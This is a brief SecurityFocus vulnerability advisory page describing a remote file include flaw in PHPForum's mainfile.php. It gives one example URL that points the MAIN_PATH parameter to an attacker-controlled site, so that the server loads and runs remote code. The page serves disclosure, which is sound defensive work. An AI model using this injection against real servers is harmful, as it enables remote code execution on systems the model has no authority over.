info
discussion
exploit
solution
references
PHPForum Mainfile.PHP Remote File Include Vulnerability
The following example was provided:
http://www.example.com/forum/mainfile.php?MAIN_PATH=[attacker's site]
Privacy Statement
Copyright 2010, SecurityFocus